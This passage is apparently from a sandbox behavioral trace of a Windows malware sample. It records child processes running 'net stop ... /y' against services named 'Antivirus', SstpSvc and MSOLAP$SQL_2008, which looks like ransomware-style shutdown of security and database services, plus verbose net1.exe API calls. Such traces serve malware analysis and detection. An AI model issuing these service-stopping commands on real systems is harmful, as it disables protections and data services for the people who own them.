CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0040.361] WriteFile (in: hFile=0x26c, lpBuffer=0x586290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afd48, lpOverlapped=0x0 | out: lpBuffer=0x586290*, lpNumberOfBytesWritten=0x1afd48*=0x2, lpOverlapped=0x0) returned 1 [0040.361] LocalFree (hMem=0x586290) returned 0x0 [0040.362] NetApiBufferFree (Buffer=0x581c60) returned 0x0 [0040.362] NetApiBufferFree (Buffer=0x581c78) returned 0x0 [0040.362] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Antivirus /y" [0040.362] exit (_Code=2) Process: id = "51" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47e55000" os_pid = "0x3b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SstpSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0x7bc Process: id = "52" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x488d5000" os_pid = "0x11c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x3b0" cmd_line = "C:\\Windows\\system32\\net1 stop SstpSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 120 os_tid = 0x3c0 [0040.575] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa00 | out: lpSystemTimeAsFileTime=0x30fa00*(dwLowDateTime=0xe2629700, dwHighDateTime=0x1d57a86)) [0040.575] GetCurrentProcessId () returned 0x11c [0040.575] GetCurrentThreadId () returned 0x3c0 [0040.575] GetTickCount () returned 0x1145236 [0040.575] QueryPerformanceCounter (in: lpPerformanceCount=0x30f9f8 | out: lpPerformanceCount=0x30f9f8*=16085935749) returned 1 [0040.575] GetModuleHandleA (lpModuleName=0x0) returned 0x3f0000 [0040.575] __set_app_type (_Type=0x1) [0040.575] __p__fmode () returned 0x74eb31f4 [0040.575] __p__commode () returned 0x74eb31fc [0040.575] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3fffe6) returned 0x0 [0040.575] __getmainargs (in: _Argc=0x409064, _Argv=0x40906c, _Env=0x409068, _DoWildCard=0, _StartInfo=0x409024 | out: _Argc=0x409064, _Argv=0x40906c, _Env=0x409068) returned 0 [0040.575] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.575] GetConsoleOutputCP () returned 0x1b5 [0040.576] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x409080 | out: lpCPInfo=0x409080) returned 1 [0040.576] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.579] sprintf_s (in: _DstBuf=0x30f9b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0040.579] setlocale (category=0, locale=".437") returned="English_United States.437" [0040.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0040.581] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0040.581] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SstpSvc /y" [0040.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f784, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0040.581] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x62) returned 0x873c00 [0040.581] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0040.582] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f988 | out: Buffer=0x30f988*=0x871c60) returned 0x0 [0040.582] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f988 | out: Buffer=0x30f988*=0x871c78) returned 0x0 [0040.582] _fileno (_File=0x74eb2900) returned -2 [0040.582] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0040.582] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0040.582] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0040.582] _wcsicmp (_String1="config", _String2="stop") returned -16 [0040.582] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0040.582] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0040.582] _wcsicmp (_String1="file", _String2="stop") returned -13 [0040.582] _wcsicmp (_String1="files", _String2="stop") returned -13 [0040.582] _wcsicmp (_String1="group", _String2="stop") returned -12 [0040.582] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0040.582] _wcsicmp (_String1="help", _String2="stop") returned -11 [0040.582] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0040.582] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0040.582] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0040.582] _wcsicmp (_String1="session", _String2="stop") returned -15 [0040.582] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0040.582] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0040.582] _wcsicmp (_String1="share", _String2="stop") returned -12 [0040.582] _wcsicmp (_String1="start", _String2="stop") returned -14 [0040.582] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0040.582] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0040.582] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0040.582] _wcsicmp (_String1="accounts", _String2="SstpSvc") returned -18 [0040.582] _wcsicmp (_String1="computer", _String2="SstpSvc") returned -16 [0040.582] _wcsicmp (_String1="config", _String2="SstpSvc") returned -16 [0040.582] _wcsicmp (_String1="continue", _String2="SstpSvc") returned -16 [0040.582] _wcsicmp (_String1="cont", _String2="SstpSvc") returned -16 [0040.583] _wcsicmp (_String1="file", _String2="SstpSvc") returned -13 [0040.583] _wcsicmp (_String1="files", _String2="SstpSvc") returned -13 [0040.583] _wcsicmp (_String1="group", _String2="SstpSvc") returned -12 [0040.583] _wcsicmp (_String1="groups", _String2="SstpSvc") returned -12 [0040.583] _wcsicmp (_String1="help", _String2="SstpSvc") returned -11 [0040.583] _wcsicmp (_String1="helpmsg", _String2="SstpSvc") returned -11 [0040.583] _wcsicmp (_String1="localgroup", _String2="SstpSvc") returned -7 [0040.583] _wcsicmp (_String1="pause", _String2="SstpSvc") returned -3 [0040.583] _wcsicmp (_String1="session", _String2="SstpSvc") returned -14 [0040.583] _wcsicmp (_String1="sessions", _String2="SstpSvc") returned -14 [0040.583] _wcsicmp (_String1="sess", _String2="SstpSvc") returned -14 [0040.583] _wcsicmp (_String1="share", _String2="SstpSvc") returned -11 [0040.583] _wcsicmp (_String1="start", _String2="SstpSvc") returned 1 [0040.583] _wcsicmp (_String1="stats", _String2="SstpSvc") returned 1 [0040.583] _wcsicmp (_String1="statistics", _String2="SstpSvc") returned 1 [0040.583] _wcsicmp (_String1="stop", _String2="SstpSvc") returned 1 [0040.583] _wcsicmp (_String1="time", _String2="SstpSvc") returned 1 [0040.583] _wcsicmp (_String1="user", _String2="SstpSvc") returned 2 [0040.583] _wcsicmp (_String1="users", _String2="SstpSvc") returned 2 [0040.583] _wcsicmp (_String1="msg", _String2="SstpSvc") returned -6 [0040.583] _wcsicmp (_String1="messenger", _String2="SstpSvc") returned -6 [0040.583] _wcsicmp (_String1="receiver", _String2="SstpSvc") returned -1 [0040.583] _wcsicmp (_String1="rcv", _String2="SstpSvc") returned -1 [0040.583] _wcsicmp (_String1="netpopup", _String2="SstpSvc") returned -5 [0040.583] _wcsicmp (_String1="redirector", _String2="SstpSvc") returned -1 [0040.583] _wcsicmp (_String1="redir", _String2="SstpSvc") returned -1 [0040.583] _wcsicmp (_String1="rdr", _String2="SstpSvc") returned -1 [0040.583] _wcsicmp (_String1="workstation", _String2="SstpSvc") returned 4 [0040.583] _wcsicmp (_String1="work", _String2="SstpSvc") returned 4 [0040.583] _wcsicmp (_String1="wksta", _String2="SstpSvc") returned 4 [0040.583] _wcsicmp (_String1="prdr", _String2="SstpSvc") returned -3 [0040.583] _wcsicmp (_String1="devrdr", _String2="SstpSvc") returned -15 [0040.583] _wcsicmp (_String1="lanmanworkstation", _String2="SstpSvc") returned -7 [0040.583] _wcsicmp (_String1="server", _String2="SstpSvc") returned -14 [0040.583] _wcsicmp (_String1="svr", _String2="SstpSvc") returned 3 [0040.584] _wcsicmp (_String1="srv", _String2="SstpSvc") returned -1 [0040.584] _wcsicmp (_String1="lanmanserver", _String2="SstpSvc") returned -7 [0040.584] _wcsicmp (_String1="alerter", _String2="SstpSvc") returned -18 [0040.584] _wcsicmp (_String1="netlogon", _String2="SstpSvc") returned -5 [0040.584] _wcsupr (in: _String="SstpSvc" | out: _String="SSTPSVC") returned="SSTPSVC" [0040.584] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8754b8 [0040.586] GetServiceKeyNameW (in: hSCManager=0x8754b8, lpDisplayName="SSTPSVC", lpServiceName=0x40aaf0, lpcchBuffer=0x30f924 | out: lpServiceName="", lpcchBuffer=0x30f924) returned 0 [0040.587] _wcsicmp (_String1="msg", _String2="SSTPSVC") returned -6 [0040.587] _wcsicmp (_String1="messenger", _String2="SSTPSVC") returned -6 [0040.587] _wcsicmp (_String1="receiver", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="rcv", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="redirector", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="redir", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="rdr", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="workstation", _String2="SSTPSVC") returned 4 [0040.587] _wcsicmp (_String1="work", _String2="SSTPSVC") returned 4 [0040.587] _wcsicmp (_String1="wksta", _String2="SSTPSVC") returned 4 [0040.587] _wcsicmp (_String1="prdr", _String2="SSTPSVC") returned -3 [0040.587] _wcsicmp (_String1="devrdr", _String2="SSTPSVC") returned -15 [0040.587] _wcsicmp (_String1="lanmanworkstation", _String2="SSTPSVC") returned -7 [0040.587] _wcsicmp (_String1="server", _String2="SSTPSVC") returned -14 [0040.587] _wcsicmp (_String1="svr", _String2="SSTPSVC") returned 3 [0040.587] _wcsicmp (_String1="srv", _String2="SSTPSVC") returned -1 [0040.587] _wcsicmp (_String1="lanmanserver", _String2="SSTPSVC") returned -7 [0040.587] _wcsicmp (_String1="alerter", _String2="SSTPSVC") returned -18 [0040.587] _wcsicmp (_String1="netlogon", _String2="SSTPSVC") returned -5 [0040.587] NetServiceControl (in: servername=0x0, service="SSTPSVC", opcode=0x0, arg=0x0, bufptr=0x30f920 | out: bufptr=0x30f920) returned 0x0 [0040.589] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x30f8fc | out: Buffer=0x30f8fc*=0x877868) returned 0x0 [0040.589] OpenServiceW (hSCManager=0x8754b8, lpServiceName="SSTPSVC", dwDesiredAccess=0xc) returned 0x8755d0 [0040.589] QueryServiceStatus (in: hService=0x8755d0, lpServiceStatus=0x30f8d0 | out: lpServiceStatus=0x30f8d0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0040.589] GetServiceDisplayNameW (in: hSCManager=0x8754b8, lpServiceName="SSTPSVC", lpDisplayName=0x411fc0, lpcchBuffer=0x30f8b4 | out: lpDisplayName="Secure Socket Tunneling Protocol Service", lpcchBuffer=0x30f8b4) returned 1 [0040.589] NetApiBufferFree (Buffer=0x877868) returned 0x0 [0040.589] CloseServiceHandle (hSCObject=0x8755d0) returned 1 [0040.590] wcscpy_s (in: _Destination=0x40a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0040.590] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0040.590] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x40b338, nSize=0x800, Arguments=0x409dd8 | out: lpBuffer="The Secure Socket Tunneling Protocol Service service is not started.\r\n") returned 0x46 [0040.591] GetFileType (hFile=0x26c) returned 0x3 [0040.592] LocalAlloc (uFlags=0x0, uBytes=0x8c) returned 0x876270 [0040.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Secure Socket Tunneling Protocol Service service is not started.\r\n", cchWideChar=70, lpMultiByteStr=0x876270, cbMultiByte=140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Secure Socket Tunneling Protocol Service service is not started.\r\n\x87", lpUsedDefaultChar=0x0) returned 70 [0040.592] WriteFile (in: hFile=0x26c, lpBuffer=0x876270*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x30f824, lpOverlapped=0x0 | out: lpBuffer=0x876270*, lpNumberOfBytesWritten=0x30f824*=0x46, lpOverlapped=0x0) returned 1 [0040.592] LocalFree (hMem=0x876270) returned 0x0 [0040.592] GetFileType (hFile=0x26c) returned 0x3 [0040.592] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x876270 [0040.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x876270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x87", lpUsedDefaultChar=0x0) returned 2 [0040.592] WriteFile (in: hFile=0x26c, lpBuffer=0x876270*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f824, lpOverlapped=0x0 | out: lpBuffer=0x876270*, lpNumberOfBytesWritten=0x30f824*=0x2, lpOverlapped=0x0) returned 1 [0040.592] LocalFree (hMem=0x876270) returned 0x0 [0040.592] _ultow (in: _Dest=0xdc1, _Radix=3209300 | out: _Dest=0xdc1) returned="3521" [0040.592] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x40b338, nSize=0x800, Arguments=0x409dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0040.592] GetFileType (hFile=0x26c) returned 0x3 [0040.592] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x876270 [0040.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x876270, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n is not started.\r\n\x87", lpUsedDefaultChar=0x0) returned 52 [0040.592] WriteFile (in: hFile=0x26c, lpBuffer=0x876270*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f830, lpOverlapped=0x0 | out: lpBuffer=0x876270*, lpNumberOfBytesWritten=0x30f830*=0x34, lpOverlapped=0x0) returned 1 [0040.592] LocalFree (hMem=0x876270) returned 0x0 [0040.592] GetFileType (hFile=0x26c) returned 0x3 [0040.592] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x876270 [0040.592] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x876270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x87", lpUsedDefaultChar=0x0) returned 2 [0040.592] WriteFile (in: hFile=0x26c, lpBuffer=0x876270*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f830, lpOverlapped=0x0 | out: lpBuffer=0x876270*, lpNumberOfBytesWritten=0x30f830*=0x2, lpOverlapped=0x0) returned 1 [0040.592] LocalFree (hMem=0x876270) returned 0x0 [0040.593] NetApiBufferFree (Buffer=0x871c60) returned 0x0 [0040.593] NetApiBufferFree (Buffer=0x871c78) returned 0x0 [0040.593] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SstpSvc /y" [0040.593] exit (_Code=2) Process: id = "53" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4895a000" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 121 os_tid = 0x7b8 Process: id = "54" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47c48000" os_pid = "0x73c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "53" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0x288 [0040.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fd20 | out: lpSystemTimeAsFileTime=0x25fd20*(dwLowDateTime=0xe283ea40, dwHighDateTime=0x1d57a86)) [0040.794] GetCurrentProcessId () returned 0x73c [0040.794] GetCurrentThreadId () returned 0x288 [0040.794] GetTickCount () returned 0x1145310 [0040.794] QueryPerformanceCounter (in: lpPerformanceCount=0x25fd18 | out: lpPerformanceCount=0x25fd18*=16107882124) returned 1 [0040.794] GetModuleHandleA (lpModuleName=0x0) returned 0xe90000 [0040.794] __set_app_type (_Type=0x1) [0040.794] __p__fmode () returned 0x74eb31f4 [0040.794] __p__commode () returned 0x74eb31fc [0040.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe9ffe6) returned 0x0 [0040.795] __getmainargs (in: _Argc=0xea9064, _Argv=0xea906c, _Env=0xea9068, _DoWildCard=0, _StartInfo=0xea9024 | out: _Argc=0xea9064, _Argv=0xea906c, _Env=0xea9068) returned 0 [0040.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.795] GetConsoleOutputCP () returned 0x1b5 [0040.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xea9080 | out: lpCPInfo=0xea9080) returned 1 [0040.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.798] sprintf_s (in: _DstBuf=0x25fcd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0040.798] setlocale (category=0, locale=".437") returned="English_United States.437" [0040.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0040.800] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0040.800] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0040.800] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25faa4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0040.800] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x72) returned 0x5cf788 [0040.800] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0040.801] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fca8 | out: Buffer=0x25fca8*=0x5d1c78) returned 0x0 [0040.801] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x25fca8 | out: Buffer=0x25fca8*=0x5d1c90) returned 0x0 [0040.801] _fileno (_File=0x74eb2900) returned -2 [0040.801] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0040.801] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0040.801] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0040.801] _wcsicmp (_String1="config", _String2="stop") returned -16 [0040.801] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0040.801] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0040.801] _wcsicmp (_String1="file", _String2="stop") returned -13 [0040.801] _wcsicmp (_String1="files", _String2="stop") returned -13 [0040.801] _wcsicmp (_String1="group", _String2="stop") returned -12 [0040.801] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0040.801] _wcsicmp (_String1="help", _String2="stop") returned -11 [0040.801] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0040.801] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0040.801] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0040.801] _wcsicmp (_String1="session", _String2="stop") returned -15 [0040.801] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0040.801] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0040.801] _wcsicmp (_String1="share", _String2="stop") returned -12 [0040.801] _wcsicmp (_String1="start", _String2="stop") returned -14 [0040.801] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0040.801] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0040.801] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0040.801] _wcsicmp (_String1="accounts", _String2="MSOLAP$SQL_2008") returned -12 [0040.801] _wcsicmp (_String1="computer", _String2="MSOLAP$SQL_2008") returned -10 [0040.801] _wcsicmp (_String1="config", _String2="MSOLAP$SQL_2008") returned -10 [0040.801] _wcsicmp (_String1="continue", _String2="MSOLAP$SQL_2008") returned -10 [0040.801] _wcsicmp (_String1="cont", _String2="MSOLAP$SQL_2008") returned -10 [0040.801] _wcsicmp (_String1="file", _String2="MSOLAP$SQL_2008") returned -7 [0040.802] _wcsicmp (_String1="files", _String2="MSOLAP$SQL_2008") returned -7 [0040.802] _wcsicmp (_String1="group", _String2="MSOLAP$SQL_2008") returned -6 [0040.802] _wcsicmp (_String1="groups", _String2="MSOLAP$SQL_2008") returned -6 [0040.802] _wcsicmp (_String1="help", _String2="MSOLAP$SQL_2008") returned -5 [0040.802] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$SQL_2008") returned -5 [0040.802] _wcsicmp (_String1="localgroup", _String2="MSOLAP$SQL_2008") returned -1 [0040.802] _wcsicmp (_String1="pause", _String2="MSOLAP$SQL_2008") returned 3 [0040.802] _wcsicmp (_String1="session", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="sessions", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="sess", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="share", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="start", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="stats", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="statistics", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="stop", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="time", _String2="MSOLAP$SQL_2008") returned 7 [0040.802] _wcsicmp (_String1="user", _String2="MSOLAP$SQL_2008") returned 8 [0040.802] _wcsicmp (_String1="users", _String2="MSOLAP$SQL_2008") returned 8 [0040.802] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0040.802] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0040.802] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0040.802] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0040.802] _wcsicmp (_String1="netpopup", _String2="MSOLAP$SQL_2008") returned 1 [0040.802] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0040.802] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0040.802] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0040.802] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0040.802] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0040.802] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0040.802] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0040.802] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0040.802] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0040.802] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0040.802] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0040.803] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0040.803] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 1 [0040.803] _wcsupr (in: _String="MSOLAP$SQL_2008" | out: _String="MSOLAP$SQL_2008") returned="MSOLAP$SQL_2008" [0040.803] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5d5460 [0040.805] GetServiceKeyNameW (in: hSCManager=0x5d5460, lpDisplayName="MSOLAP$SQL_2008", lpServiceName=0xeaaaf0, lpcchBuffer=0x25fc44 | out: lpServiceName="", lpcchBuffer=0x25fc44) returned 0 [0040.806] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0040.806] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0040.806] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0040.806] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0040.806] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0040.806] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0040.806] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0040.806] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0040.806] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0040.806] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0040.806] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0040.806] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0040.806] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0040.806] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0040.806] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0040.806] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0040.806] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0040.806] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0040.806] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 